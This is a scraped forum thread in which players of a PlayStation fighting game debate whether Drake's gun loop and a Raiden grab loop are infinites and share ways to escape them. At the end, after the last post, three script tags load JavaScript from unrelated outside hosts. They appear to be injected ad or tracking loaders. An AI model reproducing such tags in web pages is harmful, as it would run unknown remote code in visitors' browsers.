Splicer
53 posts

Re: Nathan Drake Infinite Combo

Jan 11, 2013

BIGPOPPA21089 wrote:

It gains you a measley 40 - 60 AP max before a decent player gets frustarated and holds block or your partner saves you or the other 3 players come to get you for being a **bleep**.

The problem has nothing to do with how much AP that Nate racks up from it; the problem is that it pіsses away the time on the clock, preventing the trapped player from gaining any AP for unnecessary periods of time.

Message 11 of 20 (128 Views)
0 Likes
I Only Post Everything
876 posts

Jan 11, 2013
But it shouldnt waste anytime unless you dont know.how to block. I am telling you I have been a little punk n used that "infinite" on people and if you practice you can get out before any damage is done time or ap wise. Just like I have learned to counter Kratos spam I am trying to tell you how to counter and why its not a big deal and will absolutely stay part of this game. Especially if you block he will get like 5 ap per run n gun loop. Its a dumb tactic to use as drake and is extremely annoying but really not useful or good in terms of effort vs reward
"ZA ZA ZA ZA ZING"
Mains: Jak, Isaac Subs: Spike, Drake, Evil Cole
6 Seasons with Black Belt! (should be 8)
Message 12 of 20 (121 Views)
0 Likes
I Only Post Everything
876 posts

Jan 11, 2013
Ok here is my best attempt at how to get out.

If he starts it and catches you, hold L1. Once you are blocking the bullets you can:

Medium distance from him and wall. Wait until the last bullet is coming your way right before he inputs circle and resets the run n gun. Dodge away from him, last bullet wiffs and you should be out of the loop.

Close/ directly next to him. Same thing essentially. Wait until he is reseting the loop dodge away. This time keep blocking, you are now at med distance and can dodge out.

Assuming you blocked most of his attempts at an "infinite" (which it is not because you can block mid combo) he gains like 40ap. Wasted alittle time yes, but 40 ap from like 10 seconds of gameplay is essentially doing 1 side square with kratos... which takes like half a second in real time so.... this combo is a waste of any Drakes time. The people using it only do because 60% of players think this is smash and know their opponents will barely block anything.
"ZA ZA ZA ZA ZING"
Mains: Jak, Isaac Subs: Spike, Drake, Evil Cole
6 Seasons with Black Belt! (should be 8)
Message 13 of 20 (113 Views)
0 Likes
Lombax Warrior
133 posts

[ Edited ]
Jan 11, 2013

You know I will admit it is annoying and I use it from time to time. Heck I will still use it until SB patch it. After getting stuck on that raiden forward circle into grab infinite (which lead to a guranteed level 1 btw), I have decided not to be fair anymore. It's a freaking cheap fest online so use everything you can. Oh and yeah it is NOT an infinite like many stated and just hold block till the guy mess up. This tactic is not different than any other cheap, spammable moves out there. Till this game is patch I will continue to fight fire with fire period

Message 14 of 20 (112 Views)
0 Likes
Wastelander
616 posts

Jan 11, 2013
Raiden has no infinite but it works on noobies and in lag.
Message 15 of 20 (107 Views)
0 Likes
Hekseville Citizen
398 posts

Jan 11, 2013

shadow9531 wrote:

Its an infinite in lag which is easy if the Raiden is hosting the match.

Message 16 of 20 (104 Views)
0 Likes
Lombax Warrior
133 posts

Jan 13, 2013

shadow9531 wrote:

I also thought he couldn't possibly have an infinite because there has to be a gap between the forward circle and the grab, therefore trying to grab him as well should have countered it and allow me to get out of the loop. But nooooo no matter how bad Itried to time or  mashed on grab, I was stuck in that loop for a good 3 repetition before he did the forward square into level 1. Im not gonna lie it's a very clever loop because (1) every grab depletes my meter and (2) his forward circle gives him meter. Out of all the cheap stuff in this game which I don't really mind, this one I detest the most. Im OK with raiden's plethora ways of killing or kratos ridiculous range and meter gain. But that particular grab setup into kill confirm pisses me off (mind you other chars have that throw into kill setup). I'll say it again raiden does not need it.

Now since you mentioned noobies and lag, im curious to know how would you get out of it? My first options would be to tech the grab which didn't work. Have you gotten out of it before? Does anyone have a way to get out of it?

Message 17 of 20 (90 Views)
0 Likes
Hekseville Citizen
398 posts

Jan 13, 2013

pmarc82 wrote:

shadow9531 wrote:

I also thought he couldn't possibly have an infinite because there has to be a gap between the forward circle and the grab, therefore trying to grab him as well should have countered it and allow me to get out of the loop. But nooooo no matter how bad Itried to time or  mashed on grab, I was stuck in that loop for a good 3 repetition before he did the forward square into level 1. Im not gonna lie it's a very clever loop because (1) every grab depletes my meter and (2) his forward circle gives him meter. Out of all the cheap stuff in this game which I don't really mind, this one I detest the most. Im OK with raiden's plethora ways of killing or kratos ridiculous range and meter gain. But that particular grab setup into kill confirm pisses me off (mind you other chars have that throw into kill setup). I'll say it again raiden does not need it.

Now since you mentioned noobies and lag, im curious to know how would you get out of it? My first options would be to tech the grab which didn't work. Have you gotten out of it before? Does anyone have a way to get out of it?

Theres no getting out of a grab unless another player knocks you out of it. And since Raiden can throw you into neutral square or into any of his supers he gets a rediculous advantage. But you gotta have some skill with him as I've found you can block some of his combo setups that don't involve his throw, counter, or knocking you down. So you just gotta watch out for those things.

Message 18 of 20 (83 Views)
0 Likes
Lombax Warrior
99 posts

Jan 13, 2013
this drake combo is famous for his mate to kill him
Message 19 of 20 (79 Views)
0 Likes
Gaming Beast
2167 posts

Jan 13, 2013

pmarc82 wrote:

shadow9531 wrote:

Mash jump. Unless lag makes your input come out late, this will break the loop since you can't be grabbed out of a jump, even on frame 1.

For Drake's gun loop, even if you're hit in the air you can tech down and block unless he combos it into AP burst. However, this is not, nor will it ever be, an infinite. Also if you do this close to him, wait for him to start the AK run and roll behind him to punish it.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 20 of 20 (77 Views)
0 Likes